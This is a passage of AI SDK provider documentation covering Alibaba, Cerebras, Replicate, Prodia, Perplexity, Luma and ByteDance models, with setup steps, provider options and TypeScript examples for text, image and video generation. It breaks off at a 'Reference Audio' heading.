import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-r2v-flash'),
prompt: 'character1 walks through a beautiful garden and waves at the camera',
resolution: '1280x720',
duration: 5,
providerOptions: {
alibaba: {
referenceUrls: ['https://example.com/character-reference.jpg'],
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.alibaba:
- `negativePrompt` (string): A description of what to avoid in the generated video (max 500 characters).
- `audioUrl` (string): URL to an audio file for audio-video sync (WAV/MP3, 3-30 seconds, max 15MB).
- `promptExtend` (boolean): Enable prompt extension/rewriting for better generation quality. Defaults to `true`.
- `shotType` ('single' | 'multi'): Shot type for video generation. `'multi'` enables multi-shot cinematic narrative (wan2.6 models only).
- `watermark` (boolean): Whether to add a watermark to the generated video. Defaults to `false`.
- `audio` (boolean): Whether to generate audio (for I2V and R2V models that support it).
- `referenceUrls` (string[]): Array of reference image/video URLs for reference-to-video mode. Supports 0-5 images and 0-3 videos, max 5 total.
- `pollIntervalMs` (number): Polling interval in milliseconds for checking task status. Defaults to `5000`.
- `pollTimeoutMs` (number): Maximum wait time in milliseconds for video generation. Defaults to `600000` (10 minutes).
Video Model Capabilities
Text-to-Video
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-t2v | Yes | 720P, 1080P | 2-15s |
| wan2.5-t2v-preview | Yes | 480P, 720P, 1080P | 5s, 10s |
Image-to-Video (First Frame)
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-i2v-flash | Optional | 720P, 1080P | 2-15s |
| wan2.6-i2v | Yes | 720P, 1080P | 2-15s |
Reference-to-Video
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-r2v-flash | Optional | 720P, 1080P | 2-10s |
| wan2.6-r2v | Yes | 720P, 1080P | 2-10s |
Model Capabilities
Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.
---
title: Cerebras
description: Learn how to use Cerebras's models with the AI SDK.
---
Cerebras Provider
The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.
API keys can be obtained from the Cerebras Platform.
Setup
The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:
pnpm add @ai-sdk/cerebras
Provider Instance
You can import the default provider instance cerebras from @ai-sdk/cerebras:
import { cerebras } from '@ai-sdk/cerebras';
For custom configuration, you can import createCerebras and create a provider instance with your settings:
import { createCerebras } from '@ai-sdk/cerebras';
const cerebras = createCerebras({
apiKey: process.env.CEREBRAS_API_KEY ?? '',
});
You can use the following optional settings to customize the Cerebras provider instance:
- `baseURL` (string): Use a different URL prefix for API calls. The default prefix is `https://api.cerebras.ai/v1`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `CEREBRAS_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';
const { text } = await generateText({
model: cerebras('llama3.1-8b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cerebras language models can be used in the streamText function
(see AI SDK Core).
You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:
const model = cerebras('llama-3.3-70b');
You can also use the .languageModel() and .chat() methods:
const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');
Reasoning Models
Cerebras offers several reasoning models including gpt-oss-120b, qwen-3-32b, and zai-glm-4.7 that generate intermediate thinking tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.
For gpt-oss-120b, you can control the reasoning depth using the reasoningEffort provider option:
import { cerebras } from '@ai-sdk/cerebras';
import { streamText } from 'ai';
const result = streamText({
model: cerebras('gpt-oss-120b'),
providerOptions: {
cerebras: {
reasoningEffort: 'medium',
},
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log('Reasoning:', part.text);
} else if (part.type === 'text') {
console.log('Answer:', part.text);
}
}
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Provider Options
The following optional provider options are available for Cerebras language models:
- `reasoningEffort` ('low' | 'medium' | 'high'): Controls the depth of reasoning for GPT-OSS models. Defaults to `'medium'`.
- `user` (string): A unique identifier representing your end-user, which can help with monitoring and abuse detection.
- `strictJsonSchema` (boolean): Whether to use strict JSON schema validation. When `true`, the model uses constrained decoding to guarantee schema compliance. Defaults to `true`.
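For example, a sketch combining strict schema validation with object generation (the schema is illustrative):
import { cerebras } from '@ai-sdk/cerebras';
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
  model: cerebras('llama-3.3-70b'),
  schema: z.object({
    name: z.string(),
    ingredients: z.array(z.string()),
  }),
  prompt: 'Generate a simple pasta recipe.',
  providerOptions: {
    cerebras: {
      strictJsonSchema: true, // constrained decoding for schema compliance
    },
  },
});
console.log(object);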
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Reasoning |
|---|---|---|---|---|---|
| llama3.1-8b | | | | | |
| llama-3.3-70b | | | | | |
| gpt-oss-120b | | | | | |
| qwen-3-32b | | | | | |
| qwen-3-235b-a22b-instruct-2507 | | | | | |
| qwen-3-235b-a22b-thinking-2507 | | | | | |
| zai-glm-4.6 | | | | | |
| zai-glm-4.7 | | | | | |
---
title: Replicate
description: Learn how to use Replicate models with the AI SDK.
---
Replicate Provider
Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.
Setup
The Replicate provider is available via the `@ai-sdk/replicate` module. You can install it with:
pnpm add @ai-sdk/replicate
Provider Instance
You can import the default provider instance replicate from @ai-sdk/replicate:
import { replicate } from '@ai-sdk/replicate';
If you need a customized setup, you can import createReplicate from @ai-sdk/replicate
and create a provider instance with your settings:
import { createReplicate } from '@ai-sdk/replicate';
const replicate = createReplicate({
apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});
You can use the following optional settings to customize the Replicate provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.replicate.com/v1`.
- `apiToken` (string): API token that is sent using the `Authorization` header. It defaults to the `REPLICATE_API_TOKEN` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Image Models
You can create Replicate image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Supported Image Models
The following image models are currently supported by the Replicate provider:
Text-to-Image Models:
- black-forest-labs/flux-1.1-pro-ultra
- black-forest-labs/flux-1.1-pro
- black-forest-labs/flux-dev
- black-forest-labs/flux-pro
- black-forest-labs/flux-schnell
- bytedance/sdxl-lightning-4step
- fofr/aura-flow
- fofr/latent-consistency-model
- fofr/realvisxl-v3-multi-controlnet-lora
- fofr/sdxl-emoji
- fofr/sdxl-multi-controlnet-lora
- ideogram-ai/ideogram-v2-turbo
- ideogram-ai/ideogram-v2
- lucataco/dreamshaper-xl-turbo
- lucataco/open-dalle-v1.1
- lucataco/realvisxl-v2.0
- lucataco/realvisxl2-lcm
- luma/photon-flash
- luma/photon
- nvidia/sana
- playgroundai/playground-v2.5-1024px-aesthetic
- recraft-ai/recraft-v3-svg
- recraft-ai/recraft-v3
- stability-ai/stable-diffusion-3.5-large-turbo
- stability-ai/stable-diffusion-3.5-large
- stability-ai/stable-diffusion-3.5-medium
- tstramer/material-diffusion
Inpainting and Image Editing Models:
Flux-2 Models (Multi-Reference Image Generation):
These models support up to 8 input reference images for style transfer and composition.
You can also use versioned models.
The id for versioned models is the Replicate model id followed by a colon and the version ID ($modelId:$versionId), e.g.
bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637.
Basic Usage
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';
const { image } = await generateImage({
model: replicate.image('black-forest-labs/flux-schnell'),
prompt: 'The Loch Ness Monster getting a manicure',
aspectRatio: '16:9',
});
await writeFile('image.webp', image.uint8Array);
console.log('Image saved as image.webp');
Model-specific options
import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image('recraft-ai/recraft-v3'),
prompt: 'The Loch Ness Monster getting a manicure',
size: '1365x1024',
providerOptions: {
replicate: {
style: 'realistic_image',
} satisfies ReplicateImageModelOptions,
},
});
Versioned Models
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image(
'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
),
prompt: 'The Loch Ness Monster getting a manicure',
});
Image Editing
Replicate supports image editing through various models. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: replicate.image('black-forest-labs/flux-fill-dev'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
providerOptions: {
replicate: {
guidance_scale: 7.5,
num_inference_steps: 30,
} satisfies ReplicateImageModelOptions,
},
});
Inpainting with Mask
Edit specific parts of an image using a mask. For FLUX Fill models, white areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White = inpaint, black = keep
const { images } = await generateImage({
model: replicate.image('black-forest-labs/flux-fill-pro'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
providerOptions: {
replicate: {
guidance_scale: 7.5,
num_inference_steps: 30,
} satisfies ReplicateImageModelOptions,
},
});
Multi-Reference Image Generation (Flux-2)
Flux-2 models support up to 8 input reference images for style transfer, composition, and multi-subject generation:
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
import { readFileSync } from 'node:fs';
const reference1 = readFileSync('./style-reference.png');
const reference2 = readFileSync('./subject-reference.png');
const { images } = await generateImage({
model: replicate.image('black-forest-labs/flux-2-pro'),
prompt: {
text: 'Combine the style and subjects from the reference images',
images: [reference1, reference2],
},
});
Provider Options
Common provider options for image generation:
- `maxWaitTimeInSeconds` (number): Maximum time in seconds to wait for the prediction to complete in sync mode. By default, Replicate uses sync mode with a 60-second timeout. Set to a positive number to use a custom duration (e.g., `120` for 2 minutes). When not specified, uses the default 60-second wait.
- `guidance_scale` (number): Guidance scale for classifier-free guidance. Higher values make the output more closely match the prompt.
- `num_inference_steps` (number): Number of denoising steps. More steps = higher quality but slower.
- `negative_prompt` (string): Negative prompt to guide what to avoid in the generation.
- `output_format` ('png' | 'jpg' | 'webp'): Output image format.
- `output_quality` (number, 1-100): Output image quality. Only applies to jpg and webp.
- `strength` (number, 0-1): Strength of the transformation for img2img. Lower values keep more of the original image.
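For example, a sketch passing several of these options (the values are illustrative):
import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-dev'),
  prompt: 'The Loch Ness Monster getting a manicure',
  providerOptions: {
    replicate: {
      maxWaitTimeInSeconds: 120, // wait up to 2 minutes in sync mode
      num_inference_steps: 30,
      output_format: 'webp',
    } satisfies ReplicateImageModelOptions,
  },
});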
For more details, see the Replicate models page.
---
title: Prodia
description: Learn how to use Prodia models with the AI SDK.
---
Prodia Provider
Prodia is a fast inference platform for generative AI, offering high-speed image generation with FLUX and Stable Diffusion models.
Setup
The Prodia provider is available via the `@ai-sdk/prodia` module. You can install it with:
pnpm add @ai-sdk/prodia
Provider Instance
You can import the default provider instance prodia from @ai-sdk/prodia:
import { prodia } from '@ai-sdk/prodia';
If you need a customized setup, you can import createProdia and create a provider instance with your settings:
import { createProdia } from '@ai-sdk/prodia';
const prodia = createProdia({
apiKey: 'your-api-key', // optional, defaults to PRODIA_TOKEN environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Prodia provider instance:
- `baseURL` (string): Use a different URL prefix for API calls. The default prefix is `https://inference.prodia.com/v2`.
- `apiKey` (string): API key that is sent using the `Authorization` header as a Bearer token. It defaults to the `PRODIA_TOKEN` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Image Models
You can create Prodia image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { writeFileSync } from 'node:fs';
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A cat wearing an intricate robe',
});
const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Prodia offers fast inference for various image generation models. Here are the supported model types:
| Model | Description |
|---|---|
| inference.flux-fast.schnell.txt2img.v2 | Fast FLUX Schnell model for text-to-image generation |
| inference.flux.schnell.txt2img.v2 | FLUX Schnell model for text-to-image generation |
Image Size
You can specify the image size using the size parameter in WIDTHxHEIGHT format:
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
size: '1024x768',
});
Provider Options
Prodia image models support additional options through the providerOptions.prodia object:
import { prodia, type ProdiaImageModelOptions } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A cat wearing an intricate robe',
providerOptions: {
prodia: {
width: 1024,
height: 768,
steps: 4,
stylePreset: 'cinematic',
} satisfies ProdiaImageModelOptions,
},
});
The following provider options are supported:
- `width` (number): Output width in pixels (256-1920). When set, this overrides any width derived from `size`.
- `height` (number): Output height in pixels (256-1920). When set, this overrides any height derived from `size`.
- `steps` (number): Number of computational iterations (1-4). More steps typically produce higher quality results.
- `stylePreset` (string): Apply a visual theme to the output image. Supported presets: `3d-model`, `analog-film`, `anime`, `cinematic`, `comic-book`, `digital-art`, `enhance`, `fantasy-art`, `isometric`, `line-art`, `low-poly`, `neon-punk`, `origami`, `photographic`, `pixel-art`, `texture`, `craft-clay`.
- `loras` (string[]): Augment the output with up to 3 LoRA models.
- `progressive` (boolean): When using JPEG output, return a progressive JPEG.
Seed
You can use the seed parameter to get reproducible results:
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
seed: 12345,
});
Provider Metadata
The generateImage response includes provider-specific metadata in providerMetadata.prodia.images[]. Each image object may contain the following properties:
- `jobId` (string): The unique identifier for the generation job.
- `seed` (number): The seed used for generation. Useful for reproducing results.
- `elapsed` (number): Generation time in seconds.
- `iterationsPerSecond` (number): Processing speed metric.
- `createdAt` (string): Timestamp when the job was created.
- `updatedAt` (string): Timestamp when the job was last updated.
import { prodia } from '@ai-sdk/prodia';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: prodia.image('inference.flux-fast.schnell.txt2img.v2'),
prompt: 'A serene mountain landscape at sunset',
});
// Access provider metadata
const metadata = providerMetadata?.prodia?.images?.[0];
console.log('Job ID:', metadata?.jobId);
console.log('Seed:', metadata?.seed);
console.log('Elapsed:', metadata?.elapsed);
---
title: Perplexity
description: Learn how to use Perplexity's Sonar API with the AI SDK.
---
Perplexity Provider
The Perplexity provider offers access to Sonar API - a language model that uniquely combines real-time web search with natural language processing. Each response is grounded in current web data and includes detailed citations, making it ideal for research, fact-checking, and obtaining up-to-date information.
API keys can be obtained from the Perplexity Platform.
Setup
The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:
pnpm add @ai-sdk/perplexity
Provider Instance
You can import the default provider instance perplexity from @ai-sdk/perplexity:
import { perplexity } from '@ai-sdk/perplexity';
For custom configuration, you can import createPerplexity and create a provider instance with your settings:
import { createPerplexity } from '@ai-sdk/perplexity';
const perplexity = createPerplexity({
apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});
You can use the following optional settings to customize the Perplexity provider instance:
- `baseURL` (string): Use a different URL prefix for API calls. The default prefix is `https://api.perplexity.ai`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `PERPLEXITY_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create Perplexity models using a provider instance:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
Sources
Websites that have been used to generate the response are included in the sources property of the result:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
console.log(sources);
Provider Options & Metadata
The Perplexity provider includes additional metadata in the response through providerMetadata.
Additional configuration options are available through providerOptions.
const result = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
providerOptions: {
perplexity: {
return_images: true, // Enable image responses (Tier-2 Perplexity users only)
search_recency_filter: 'week', // Filter search results by recency
},
},
});
console.log(result.providerMetadata);
// Example output:
// {
// perplexity: {
// usage: { citationTokens: 5286, numSearchQueries: 1 },
// images: [
// { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
// { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
// ]
// },
// }
Provider Options
The following provider-specific options are available:
- `return_images` (boolean): Enable image responses. When set to `true`, the response may include relevant images. This feature is only available to Perplexity Tier-2 users and above.
- `search_recency_filter` (string): Filter search results by recency. Possible values: `'hour'`, `'day'`, `'week'`, `'month'`. If not specified, defaults to all time.
Provider Metadata
The response metadata includes:
- `usage`: Object containing `citationTokens` and `numSearchQueries` metrics.
- `images`: Array of image objects when `return_images` is enabled (Tier-2 users only). Each image contains `imageUrl`, `originUrl`, `height`, and `width`.
PDF Support
The Perplexity provider supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
import fs from 'node:fs';
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const result = await generateText({
model: perplexity('sonar-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is this document about?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass the URL of a PDF:
{
type: 'file',
data: new URL('https://example.com/document.pdf'),
mediaType: 'application/pdf',
filename: 'document.pdf', // optional
}
The model will have access to the contents of the PDF file and respond to questions about it.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| sonar-deep-research | | | | |
| sonar-reasoning-pro | | | | |
| sonar-reasoning | | | | |
| sonar-pro | | | | |
| sonar | | | | |
---
title: Luma
description: Learn how to use Luma AI models with the AI SDK.
---
Luma Provider
Luma AI provides state-of-the-art image generation models through their Dream Machine platform. Their models offer ultra-high quality image generation with superior prompt understanding and unique capabilities like character consistency and multi-image reference support.
Setup
The Luma provider is available via the `@ai-sdk/luma` module. You can install it with:
pnpm add @ai-sdk/luma
Provider Instance
You can import the default provider instance luma from @ai-sdk/luma:
import { luma } from '@ai-sdk/luma';
If you need a customized setup, you can import createLuma and create a provider instance with your settings:
import { createLuma } from '@ai-sdk/luma';
const luma = createLuma({
apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Luma provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.lumalabs.ai`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `LUMA_API_KEY` environment variable.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Image Models
You can create Luma image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { luma, type LumaImageModelOptions } from '@ai-sdk/luma';
import { generateImage } from 'ai';
import fs from 'fs';
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Image Model Settings
You can customize the generation behavior with optional settings:
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
maxImagesPerCall: 1, // Maximum number of images to generate per API call
providerOptions: {
luma: {
pollIntervalMillis: 5000, // How often to check for completed images (in ms)
maxPollAttempts: 10, // Maximum number of polling attempts before timeout
} satisfies LumaImageModelOptions,
},
});
Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:
- `maxImagesPerCall` (number): Override the maximum number of images generated per API call. Defaults to 1.
- `pollIntervalMillis` (number): Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
- `maxPollAttempts` (number): Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.
Model Capabilities
Luma offers two main models:
| Model | Description |
|---|---|
| photon-1 | High-quality image generation with superior prompt understanding |
| photon-flash-1 | Faster generation optimized for speed while maintaining quality |
Both models support the following aspect ratios:
- 1:1
- 3:4
- 4:3
- 9:16
- 16:9 (default)
- 9:21
- 21:9
For more details about supported aspect ratios, see the Luma Image Generation documentation.
Key features of Luma models include:
- Ultra-high quality image generation
- 10x higher cost efficiency compared to similar models
- Superior prompt understanding and adherence
- Unique character consistency capabilities from single reference images
- Multi-image reference support for precise style matching
Image editing
Luma supports different modes of generating images that reference other images.
Modify an image
Images have to be passed as URLs. weight can be configured for each image in the providerOptions.luma.images array.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'transform the bike to a boat',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
providerOptions: {
luma: {
referenceType: 'modify_image',
images: [{ weight: 1.0 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#modify-image.
Reference an image
Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight for each image (0-1) to control the influence of reference images.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'image',
images: [{ weight: 0.8 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#image-reference
Style Reference
Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A blue cream Persian cat launching its website on Vercel',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'style',
images: [{ weight: 0.8 }],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#style-reference
Character Reference
Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.
await generateImage({
model: luma.image('photon-flash-1'),
prompt: {
text: 'A woman with a cat riding a broomstick in a forest',
images: [
'https://hebbkx1anhila5yf.public.blob.vercel-storage.com/future-me-8hcBWcZOkbE53q3gshhEm16S87qDpF.jpeg',
],
},
aspectRatio: '1:1',
providerOptions: {
luma: {
referenceType: 'character',
images: [
{
id: 'identity0',
},
],
} satisfies LumaImageModelOptions,
},
});
Learn more at https://docs.lumalabs.ai/docs/image-generation#character-reference
---
title: ByteDance
description: Learn how to use ByteDance Seedance video models with the AI SDK.
---
ByteDance Provider
The ByteDance provider contains support for the Seedance family of video generation models through the BytePlus ModelArk platform. Seedance provides high-quality text-to-video and image-to-video generation capabilities, including audio-video synchronization, first-and-last frame control, and multi-reference image generation.
Setup
The ByteDance provider is available via the `@ai-sdk/bytedance` module. You can install it with:
pnpm add @ai-sdk/bytedance
Provider Instance
You can import the default provider instance byteDance from @ai-sdk/bytedance:
import { byteDance } from '@ai-sdk/bytedance';
If you need a customized setup, you can import createByteDance and create a provider instance with your settings:
import { createByteDance } from '@ai-sdk/bytedance';
const byteDance = createByteDance({
apiKey: 'your-api-key', // optional, defaults to ARK_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the ByteDance provider instance:
- `baseURL` (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://ark.ap-southeast.bytepluses.com/api/v3`.
- `apiKey` (string): API key that is sent using the `Authorization` header. It defaults to the `ARK_API_KEY` environment variable. You can obtain an API key from the BytePlus console.
- `headers` (Record<string, string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Video Models
You can create ByteDance video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
Text-to-Video
Generate videos from text prompts:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-0-pro-250528'),
prompt:
'Photorealistic style: Under a clear blue sky, a vast expanse of white daisy fields stretches out. The camera gradually zooms in and fixates on a close-up of a single daisy.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
bytedance: {
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
console.log(video.url);
Image-to-Video
Generate videos from a first-frame image with an optional text prompt:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/first-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
bytedance: {
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Image-to-Video with Audio
Seedance 1.5 Pro supports generating synchronized audio alongside the video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/pianist.png',
text: 'A young man sits at a piano, playing calmly. Gentle piano music plays in sync with his movements.',
},
duration: 5,
providerOptions: {
bytedance: {
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
First-and-Last Frame Video
Generate smooth transitions between a starting and ending keyframe image:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-5-pro-251215'),
prompt: {
image: 'https://example.com/first-frame.jpg',
text: 'Create a 360-degree orbiting camera shot based on this photo',
},
duration: 5,
providerOptions: {
bytedance: {
lastFrameImage: 'https://example.com/last-frame.jpg',
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Multi-Reference Image-to-Video
Using the Seedance 1.0 Lite I2V model, you can provide multiple reference images (1-4) that the model uses to faithfully reproduce object shapes, colors, and textures:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('seedance-1-0-lite-i2v-250428'),
prompt:
'A boy wearing glasses and a blue T-shirt from [Image 1] and a corgi dog from [Image 2], sitting on the lawn from [Image 3], in 3D cartoon style',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
bytedance: {
referenceImages: [
'https://example.com/boy.png',
'https://example.com/corgi.png',
'https://example.com/lawn.png',
],
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Reference Video
Seedance 2.0 supports reference videos that guide the style, motion, or composition of the generated video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('dreamina-seedance-2-0-260128'),
prompt:
'First-person perspective promotional ad, using the composition and camera movement from the reference video',
aspectRatio: '16:9',
duration: 4,
providerOptions: {
bytedance: {
referenceVideos: ['https://example.com/reference-video.mp4'],
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Reference Audio
